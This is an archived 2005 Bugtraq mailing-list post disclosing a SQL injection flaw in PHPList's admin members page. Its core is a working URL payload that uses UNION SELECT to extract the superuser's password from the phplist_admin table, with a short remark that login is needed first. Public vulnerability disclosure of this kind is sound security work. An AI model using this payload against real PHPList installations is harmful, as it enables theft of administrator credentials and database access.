[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: PHPList Vunerability
From: ziot () whataboutpp ! com
Date: 2005-07-31 23:02:38
Message-ID: 20050731230238.22060.qmail () securityfocus ! com
[Download RAW message or body]
http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password
Although not completely open because one must authenticate, but completely leaves the \
database open.. thus being a SQL Injection hole.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic